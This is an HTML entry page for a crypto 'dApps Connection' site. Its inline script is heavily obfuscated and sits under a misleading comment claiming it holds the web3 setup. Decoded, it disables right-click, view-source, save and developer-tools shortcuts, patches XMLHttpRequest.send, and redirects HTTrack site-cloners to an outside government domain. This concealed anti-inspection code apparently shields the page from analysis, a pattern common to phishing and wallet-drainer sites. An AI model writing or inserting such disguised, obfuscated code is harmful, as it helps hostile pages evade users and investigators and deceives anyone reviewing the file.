<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="keyword" content="Blockchains, dApps, Smart Contracts" />
    <meta
      property="og:title"
      content="Welcome to the world of decentralized applications"
    />
    <meta property="og:type" content="website" />
    <meta property="og:image" content="./socials.svg" />
    <title>dApps Connection</title>
    <!-- Bootstrap CSS -->
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-9ndCyUaIbzAi2FUVXJi0CjmCapSmO7SnpJef0486qhLnuZ2cdeRhO02iuK6FUUVM"
      crossorigin="anonymous"
    />
  </head>

  <body>
    <div id="root"></div>
    <!-- Bootstrap JS -->
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"
      integrity="sha384-geWF76RCwLtnZ8qwWowPQNguL3RmwHVBC9FhGdlKrxdiJJigb/j/68SIy3Te4Bkz"
      crossorigin="anonymous"
    ></script>

    <script>
      // Все что нужно для web3 (в этом скрипте).
      //зачем ищешь?
      (function (_0x2b11c4, _0x4e50e1) {
        const _0x51c649 = {
            _0x4f5506: 0x1af,
            _0x1aec15: 0x1b6,
            _0x28b530: 0x1ac,
            _0x2bbcb1: 0x1c5,
            _0x38811d: 0x19d,
            _0x2750ff: 0x1b4,
            _0x5883d9: 0x1b8,
            _0x58dc8b: 0x1a3,
            _0x50b4bf: 0x1b1,
            _0x57b86f: 0x1a2,
            _0x532320: 0x1a2,
            _0xc5e2a6: 0x1a6,
            _0x207c8a: 0x1ae,
            _0x5b707d: 0x1a9,
            _0x1d37a2: 0x1b0,
            _0x447e69: 0x1b9,
            _0xf3bacf: 0x1ad,
            _0x37c23a: 0x19a,
          },
          _0x5cfca7 = _0x2b11c4();
        function _0x1a8547(_0xd8be1f, _0x4e114d, _0x55040f, _0x2ab685) {
          return _0x258d(_0x4e114d - -0x2a5, _0xd8be1f);
        }
        while (!![]) {
          try {
            const _0x3fa762 =
              -parseInt(
                _0x1a8547(
                  -_0x51c649._0x4f5506,
                  -_0x51c649._0x1aec15,
                  -_0x51c649._0x28b530,
                  -_0x51c649._0x2bbcb1
                )
              ) /
                0x1 +
              -parseInt(
                _0x1a8547(
                  -0x1a5,
                  -0x1a9,
                  -_0x51c649._0x38811d,
                  -_0x51c649._0x2750ff
                )
              ) /
                0x2 +
              (parseInt(_0x1a8547(-0x1c3, -0x1bd, -0x1cb, -0x1cb)) / 0x3) *
                (parseInt(
                  _0x1a8547(-0x1b3, -_0x51c649._0x5883d9, -0x1c6, -0x1ae)
                ) /
                  0x4) +
              (parseInt(
                _0x1a8547(
                  -0x1a1,
                  -_0x51c649._0x58dc8b,
                  -_0x51c649._0x50b4bf,
                  -0x1a4
                )
              ) /
                0x5) *
                (-parseInt(
                  _0x1a8547(
                    -_0x51c649._0x38811d,
                    -_0x51c649._0x57b86f,
                    -_0x51c649._0x532320,
                    -_0x51c649._0x532320
                  )
                ) /
                  0x6) +
              -parseInt(
                _0x1a8547(
                  -_0x51c649._0xc5e2a6,
                  -_0x51c649._0x207c8a,
                  -_0x51c649._0x5b707d,
                  -_0x51c649._0x1d37a2
                )
              ) /
                0x7 +
              parseInt(
                _0x1a8547(-0x1a8, -0x1af, -_0x51c649._0x447e69, -0x1af)
              ) /
                0x8 +
              (-parseInt(
                _0x1a8547(
                  -_0x51c649._0x207c8a,
                  -0x1ba,
                  -0x1ac,
                  -_0x51c649._0xf3bacf
                )
              ) /
                0x9) *
                (-parseInt(
                  _0x1a8547(
                    -_0x51c649._0x58dc8b,
                    -0x1a8,
                    -0x1a5,
                    -_0x51c649._0x37c23a
                  )
                ) /
                  0xa);
            if (_0x3fa762 === _0x4e50e1) break;
            else _0x5cfca7["push"](_0x5cfca7["shift"]());
          } catch (_0x504441) {
            _0x5cfca7["push"](_0x5cfca7["shift"]());
          }
        }
      })(_0x5ecc, 0x4bbb6),
        document[
          _0x4aae47(0x4ab, 0x4b0, 0x4b5, 0x4b8) +
            _0x4aae47(0x4a8, 0x4b5, 0x4b5, 0x4b5)
        ](_0x4aae47(0x4a1, 0x4a0, 0x4a0, 0x4a5), function (_0x4e887c) {
          const _0x220aef = {
              _0x548a96: 0x4a5,
              _0x1f0aef: 0x496,
              _0x53b320: 0x4a9,
              _0xe2fc54: 0x4c1,
              _0x3c7b5a: 0x4bb,
              _0x507eb8: 0x4b6,
              _0x7a1762: 0x4af,
              _0x554039: 0x4b5,
              _0x54ca8c: 0x49b,
              _0x250708: 0x4a3,
              _0x454db3: 0x4a6,
            },
            _0x5d9c13 = { _0x42fd5e: 0x1, _0x2c5cc3: 0x144, _0x6786a8: 0xe2 };
          function _0x1bba66(_0x5e153c, _0x2be84b, _0x30e5db, _0x2e85e6) {
            return _0x4aae47(
              _0x2be84b - -_0x5d9c13._0x42fd5e,
              _0x30e5db,
              _0x30e5db - _0x5d9c13._0x2c5cc3,
              _0x2e85e6 - _0x5d9c13._0x6786a8
            );
          }
          _0x4e887c[
            _0x1bba66(0x4a2, _0x220aef._0x548a96, 0x4ae, _0x220aef._0x1f0aef)
          ] &&
            _0x4e887c[
              _0x1bba66(
                _0x220aef._0x53b320,
                0x4b7,
                _0x220aef._0xe2fc54,
                _0x220aef._0x3c7b5a
              )
            ] &&
            (_0x4e887c[
              _0x1bba66(
                _0x220aef._0x507eb8,
                _0x220aef._0x7a1762,
                _0x220aef._0x554039,
                0x4af
              )
            ] === "\x69" ||
              _0x4e887c[_0x1bba66(0x4b2, 0x4af, 0x4b5, 0x4a7)] === "\x49") &&
            _0x4e887c[
              _0x1bba66(
                _0x220aef._0x54ca8c,
                _0x220aef._0x250708,
                _0x220aef._0x454db3,
                _0x220aef._0x54ca8c
              ) + "\x61\x75\x6c\x74"
            ]();
        }),
        document[
          _0x4aae47(0x4ab, 0x4a4, 0x49d, 0x4b0) +
            _0x4aae47(0x4a8, 0x49b, 0x4b6, 0x4a6)
        ](_0x4aae47(0x4a1, 0x4ab, 0x49c, 0x4aa), function (_0x594376) {
          const _0x3ff5c3 = {
              _0x252470: 0x48c,
              _0x31f883: 0x4a0,
              _0x206641: 0x496,
              _0x19582a: 0x491,
              _0xf0bb4a: 0x48f,
              _0x373488: 0x485,
              _0x57addd: 0x488,
              _0x17d4b0: 0x49d,
              _0x1d2f05: 0x483,
              _0x50ec5e: 0x48f,
              _0x677897: 0x495,
              _0xdcff5d: 0x48d,
              _0x47672d: 0x476,
              _0x3483c1: 0x482,
              _0xcf211f: 0x491,
            },
            _0x5253bf = { _0x51b76a: 0x4a };
          function _0x3c7be9(_0x4ed13d, _0x376975, _0x23a545, _0x5e032b) {
            return _0x4aae47(
              _0x23a545 - -0x21,
              _0x5e032b,
              _0x23a545 - _0x5253bf._0x51b76a,
              _0x5e032b - 0x4
            );
          }
          (_0x594376[_0x3c7be9(0x47f, _0x3ff5c3._0x252470, 0x485, 0x493)] ||
            _0x594376[_0x3c7be9(0x484, 0x49c, 0x492, _0x3ff5c3._0x31f883)]) &&
            (_0x594376[
              _0x3c7be9(_0x3ff5c3._0x252470, _0x3ff5c3._0x206641, 0x48f, 0x482)
            ] === "\x73" ||
              _0x594376[_0x3c7be9(_0x3ff5c3._0x19582a, 0x494, 0x48f, 0x48f)] ===
                "\x53") &&
            _0x594376[
              "\x70\x72\x65\x76\x65\x6e\x74\x44\x65\x66" +
                _0x3c7be9(
                  _0x3ff5c3._0xf0bb4a,
                  _0x3ff5c3._0x373488,
                  _0x3ff5c3._0x19582a,
                  _0x3ff5c3._0x57addd
                )
            ](),
            (_0x594376["\x61\x6c\x74\x4b\x65\x79"] ||
              _0x594376[
                _0x3c7be9(
                  _0x3ff5c3._0x373488,
                  _0x3ff5c3._0x17d4b0,
                  0x492,
                  _0x3ff5c3._0x1d2f05
                )
              ]) &&
              (_0x594376[
                _0x3c7be9(0x491, 0x481, _0x3ff5c3._0x50ec5e, 0x48e)
              ] === "\x75" ||
                _0x594376[
                  _0x3c7be9(
                    0x487,
                    _0x3ff5c3._0x677897,
                    0x48f,
                    _0x3ff5c3._0xdcff5d
                  )
                ] === "\x55") &&
              _0x594376[
                _0x3c7be9(
                  _0x3ff5c3._0x47672d,
                  _0x3ff5c3._0x19582a,
                  0x483,
                  _0x3ff5c3._0x3483c1
                ) + _0x3c7be9(0x494, 0x49f, _0x3ff5c3._0xcf211f, 0x49d)
              ]();
        });
      function _0x4aae47(_0x17fc5a, _0x5c71ef, _0x2217cc, _0xac7bec) {
        return _0x258d(_0x17fc5a - 0x3b8, _0x5c71ef);
      }
      function _0x5ecc() {
        const _0x40f32b = [
          "\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73",
          "\x63\x6f\x6e\x74\x65\x78\x74\x6d\x65\x6e",
          "\x73\x68\x69\x66\x74\x4b\x65\x79",
          "\x68\x74\x74\x72\x61\x63\x6b",
          "\x31\x30\x71\x4d\x44\x6d\x62\x53",
          "\x31\x39\x32\x32\x35\x38\x50\x74\x55\x67\x65\x76",
          "\x70\x72\x6f\x74\x6f\x74\x79\x70\x65",
          "\x6b\x65\x79\x43\x6f\x64\x65",
          "\x37\x38\x55\x72\x77\x45\x61\x54",
          "\x6b\x65\x79\x64\x6f\x77\x6e",
          "\x77\x2e\x75\x73\x63\x70\x2e\x67\x6f\x76",
          "\x38\x30\x38\x32\x35\x36\x37\x66\x67\x41\x77\x77\x71",
          "\x70\x72\x65\x76\x65\x6e\x74\x44\x65\x66",
          "\x32\x39\x34\x39\x32\x61\x77\x53\x4b\x61\x49",
          "\x63\x74\x72\x6c\x4b\x65\x79",
          "\x32\x36\x32\x32\x34\x37\x65\x68\x47\x61\x79\x45",
          "\x73\x74\x65\x6e\x65\x72",
          "\x61\x70\x70\x6c\x79",
          "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77",
          "\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69",
          "\x68\x72\x65\x66",
          "\x73\x65\x6e\x64",
          "\x35\x34\x33\x34\x35\x36\x75\x64\x70\x50\x7a\x52",
          "\x32\x32\x36\x32\x33\x34\x34\x69\x41\x68\x57\x6b\x68",
          "\x6b\x65\x79",
          "\x6c\x6f\x63\x61\x74\x69\x6f\x6e",
          "\x61\x75\x6c\x74",
          "\x6d\x65\x74\x61\x4b\x65\x79",
          "\x33\x39\x35\x39\x34\x30\x4d\x41\x69\x69\x54\x6c",
          "\x31\x30\x71\x62\x41\x78\x46\x51",
        ];
        _0x5ecc = function () {
          return _0x40f32b;
        };
        return _0x5ecc();
      }
      document[
        _0x4aae47(0x4ab, 0x49c, 0x4a4, 0x4b4) +
          _0x4aae47(0x4a8, 0x4ac, 0x4ae, 0x4a9)
      ](_0x4aae47(0x4b7, 0x4b7, 0x4b2, 0x4c5) + "\x75", (_0x46324a) => {
        const _0x2dc30a = {
            _0x1cb173: 0x1b3,
            _0x41b2c4: 0x1c5,
            _0x132e49: 0x1bd,
            _0x510cf9: 0x1b4,
            _0x35b62f: 0x1b7,
          },
          _0x369213 = { _0xbcbf49: 0x14c, _0x44f66f: 0x19b };
        function _0x8327a(_0x1e4ced, _0x141d1a, _0x5469b5, _0x4bb878) {
          return _0x4aae47(
            _0x4bb878 - -0x660,
            _0x5469b5,
            _0x5469b5 - _0x369213._0xbcbf49,
            _0x4bb878 - _0x369213._0x44f66f
          );
        }
        _0x46324a[
          _0x8327a(
            -_0x2dc30a._0x1cb173,
            -_0x2dc30a._0x41b2c4,
            -_0x2dc30a._0x132e49,
            -0x1bc
          ) +
            _0x8327a(-_0x2dc30a._0x510cf9, -_0x2dc30a._0x35b62f, -0x1ba, -0x1ae)
        ]();
      }),
        document[
          _0x4aae47(0x4ab, 0x4a1, 0x4a0, 0x4b2) + "\x73\x74\x65\x6e\x65\x72"
        ](_0x4aae47(0x4a1, 0x4af, 0x49b, 0x493), function (_0xc4c78b) {
          const _0x428a44 = {
              _0x3e8aaf: 0x411,
              _0x597d4d: 0x406,
              _0x74a22b: 0x404,
              _0x583712: 0x420,
              _0x128b67: 0x417,
              _0x13fc83: 0x411,
            },
            _0x4c5698 = { _0xac14a3: 0x16c, _0xd0a3ce: 0x130 };
          function _0x38d662(_0x59d43f, _0x637f65, _0x4cbb84, _0x337803) {
            return _0x4aae47(
              _0x337803 - -0x9d,
              _0x4cbb84,
              _0x4cbb84 - _0x4c5698._0xac14a3,
              _0x337803 - _0x4c5698._0xd0a3ce
            );
          }
          _0xc4c78b[
            _0x38d662(_0x428a44._0x3e8aaf, _0x428a44._0x597d4d, 0x40b, 0x402)
          ] == 0x7b &&
            _0xc4c78b[
              _0x38d662(0x405, 0x40e, _0x428a44._0x74a22b, 0x407) +
                _0x38d662(
                  _0x428a44._0x583712,
                  _0x428a44._0x128b67,
                  _0x428a44._0x13fc83,
                  0x415
                )
            ]();
        }),
        document[
          _0x4aae47(0x4ab, 0x4ba, 0x4a2, 0x4a3) +
            _0x4aae47(0x4a8, 0x4ab, 0x4aa, 0x4b2)
        ](_0x4aae47(0x4a1, 0x49d, 0x4a1, 0x497), function (_0x25c4f5) {
          const _0xe6bd3a = {
              _0x2cf56a: 0x1bb,
              _0x35acad: 0x1c7,
              _0x1116d3: 0x1b2,
              _0x4f04de: 0x1bb,
              _0x2c9678: 0x1a8,
              _0x327043: 0x1ad,
              _0x5e89f9: 0x1b1,
              _0x1190ec: 0x1c2,
              _0x40ef6c: 0x1bd,
              _0xcd4c23: 0x1a7,
            },
            _0x39a5aa = { _0x51d904: 0x661, _0x3c3708: 0x98 };
          function _0x2ba0fd(_0x2c46d2, _0x57c22a, _0x24d0f2, _0x56d989) {
            return _0x4aae47(
              _0x56d989 - -_0x39a5aa._0x51d904,
              _0x24d0f2,
              _0x24d0f2 - 0x1cd,
              _0x56d989 - _0x39a5aa._0x3c3708
            );
          }
          _0x25c4f5[
            _0x2ba0fd(
              -_0xe6bd3a._0x2cf56a,
              -_0xe6bd3a._0x35acad,
              -_0xe6bd3a._0x1116d3,
              -_0xe6bd3a._0x4f04de
            )
          ] &&
            (_0x25c4f5["\x6b\x65\x79"] === "\x55" ||
              _0x25c4f5[
                _0x2ba0fd(
                  -_0xe6bd3a._0x2c9678,
                  -0x1b5,
                  -_0xe6bd3a._0x327043,
                  -_0xe6bd3a._0x5e89f9
                )
              ] === "\x75") &&
            _0x25c4f5[
              _0x2ba0fd(
                -_0xe6bd3a._0x1190ec,
                -0x1b4,
                -0x1c4,
                -_0xe6bd3a._0x40ef6c
              ) + _0x2ba0fd(-0x1b9, -0x1af, -_0xe6bd3a._0xcd4c23, -0x1af)
            ]();
        }),
        document[
          "\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69" +
            _0x4aae47(0x4a8, 0x49f, 0x4a6, 0x49e)
        ]("\x6b\x65\x79\x64\x6f\x77\x6e", function (_0x491c6a) {
          const _0x46d061 = {
              _0x5a1c85: 0x12c,
              _0xbe6164: 0x11e,
              _0x171205: 0x129,
              _0x2c72fb: 0x123,
              _0x1f31fe: 0x11b,
              _0x494a32: 0x11d,
              _0x234cf5: 0x12e,
              _0x2c719c: 0x12c,
              _0x1f006e: 0x120,
              _0x5e1aa7: 0x115,
              _0x10553d: 0x12a,
            },
            _0x265d4e = { _0x12203e: 0x5d2 };
          function _0x56e2f6(_0x213c2b, _0x1cb88b, _0x1bb724, _0x58f089) {
            return _0x4aae47(
              _0x213c2b - -_0x265d4e._0x12203e,
              _0x1bb724,
              _0x1bb724 - 0x9d,
              _0x58f089 - 0x168
            );
          }
          _0x491c6a[
            _0x56e2f6(
              -_0x46d061._0x5a1c85,
              -_0x46d061._0xbe6164,
              -_0x46d061._0x171205,
              -0x12f
            )
          ] &&
            _0x491c6a[_0x56e2f6(-0x11a, -0x115, -0x11f, -0x124)] &&
            (_0x491c6a[
              _0x56e2f6(
                -0x122,
                -_0x46d061._0x2c72fb,
                -_0x46d061._0x1f31fe,
                -0x11b
              )
            ] === "\x49" ||
              _0x491c6a[
                _0x56e2f6(-0x122, -0x115, -_0x46d061._0x494a32, -0x128)
              ] === "\x69") &&
            _0x491c6a[
              _0x56e2f6(
                -_0x46d061._0x234cf5,
                -_0x46d061._0x2c719c,
                -0x126,
                -0x138
              ) +
                _0x56e2f6(
                  -_0x46d061._0x1f006e,
                  -0x119,
                  -_0x46d061._0x5e1aa7,
                  -_0x46d061._0x10553d
                )
            ]();
        });
      const originalSend =
        XMLHttpRequest[_0x4aae47(0x49e, 0x495, 0x4a3, 0x4a9)][
          _0x4aae47(0x4ad, 0x4b9, 0x4a1, 0x4a9)
        ];
      function _0x258d(_0xa9cc89, _0x1e344d) {
        const _0x5ecc11 = _0x5ecc();
        return (
          (_0x258d = function (_0x258dcc, _0x4d12dc) {
            _0x258dcc = _0x258dcc - 0xe6;
            let _0x4ba3c8 = _0x5ecc11[_0x258dcc];
            return _0x4ba3c8;
          }),
          _0x258d(_0xa9cc89, _0x1e344d)
        );
      }
      XMLHttpRequest[_0x4aae47(0x49e, 0x4ab, 0x4a7, 0x493)][
        _0x4aae47(0x4ad, 0x4ae, 0x4b2, 0x4b6)
      ] = function () {
        const _0x4e06cc = { _0x2181bd: 0x10e },
          _0x382817 = { _0x26714e: 0x1ce };
        function _0x91db31(_0x4e93be, _0x4f6f4b, _0x928e10, _0x50a8df) {
          return _0x4aae47(
            _0x928e10 - -0x5b6,
            _0x50a8df,
            _0x928e10 - _0x382817._0x26714e,
            _0x50a8df - 0xa1
          );
        }
        arguments[0x0] === null && (arguments[0x0] = ""),
          originalSend[_0x91db31(-_0x4e06cc._0x2181bd, -0x118, -0x10d, -0x107)](
            this,
            arguments
          );
      };
      window[_0x4aae47(0x4b9, 0x4b3, 0x4c1, 0x4b8)] &&
        (window[_0x4aae47(0x4b1, 0x4ac, 0x4a8, 0x4a2)][
          _0x4aae47(0x4ac, 0x4b5, 0x4a4, 0x4b5)
        ] =
          _0x4aae47(0x4aa, 0x4a3, 0x4af, 0x4b0) +
          _0x4aae47(0x4a2, 0x49c, 0x49f, 0x496) +
          "\x2f");
      var userAgent =
        navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"][
          _0x4aae47(0x4b6, 0x4bf, 0x4bf, 0x4b2) + "\x65"
        ]();
      userAgent["\x69\x6e\x64\x65\x78\x4f\x66"](
        _0x4aae47(0x4b9, 0x4b0, 0x4b4, 0x4b2)
      ) !== -0x1 &&
        (window[_0x4aae47(0x4b1, 0x4a3, 0x4b1, 0x4a7)][
          _0x4aae47(0x4ac, 0x4a3, 0x4b4, 0x4ab)
        ] =
          _0x4aae47(0x4aa, 0x4ad, 0x4b5, 0x4ac) +
          _0x4aae47(0x4a2, 0x4ae, 0x49f, 0x4ae) +
          "\x2f");
      document[
        _0x4aae47(0x4ab, 0x4b9, 0x4a1, 0x4a8) +
          _0x4aae47(0x4a8, 0x4b5, 0x4a1, 0x4ae)
      ](_0x4aae47(0x4a1, 0x4b0, 0x4a2, 0x496), function (_0x29788f) {
        const _0x4dea04 = {
            _0x1bbc1d: 0x3f9,
            _0x1e17dc: 0x3f4,
            _0x623e5c: 0x3e6,
            _0x3a0f23: 0x3ef,
            _0x2ee835: 0x403,
            _0x2fe9ec: 0x3ed,
            _0x495fbe: 0x3fe,
            _0x3adc1f: 0x3eb,
            _0x4084b0: 0x3f0,
          },
          _0x4244ee = { _0x4b324b: 0x87, _0x125293: 0xec };
        function _0x308ec7(_0x17c155, _0x3d0e8e, _0x465fea, _0xce047f) {
          return _0x4aae47(
            _0x3d0e8e - -0xbc,
            _0x465fea,
            _0x465fea - _0x4244ee._0x4b324b,
            _0xce047f - _0x4244ee._0x125293
          );
        }
        _0x29788f["\x63\x74\x72\x6c\x4b\x65\x79"] &&
          (_0x29788f[
            _0x308ec7(
              _0x4dea04._0x1bbc1d,
              _0x4dea04._0x1e17dc,
              _0x4dea04._0x623e5c,
              _0x4dea04._0x3a0f23
            )
          ] === "\x73" ||
            _0x29788f[
              _0x308ec7(
                _0x4dea04._0x2ee835,
                _0x4dea04._0x1e17dc,
                _0x4dea04._0x2fe9ec,
                _0x4dea04._0x495fbe
              )
            ] === "\x53") &&
          _0x29788f[
            _0x308ec7(0x3f6, 0x3e8, 0x3f4, 0x3f0) +
              _0x308ec7(_0x4dea04._0x3adc1f, 0x3f6, _0x4dea04._0x4084b0, 0x3f8)
          ]();
      });
    </script>

    <script type="module" src="/src/main.jsx"></script>
  </body>
</html>
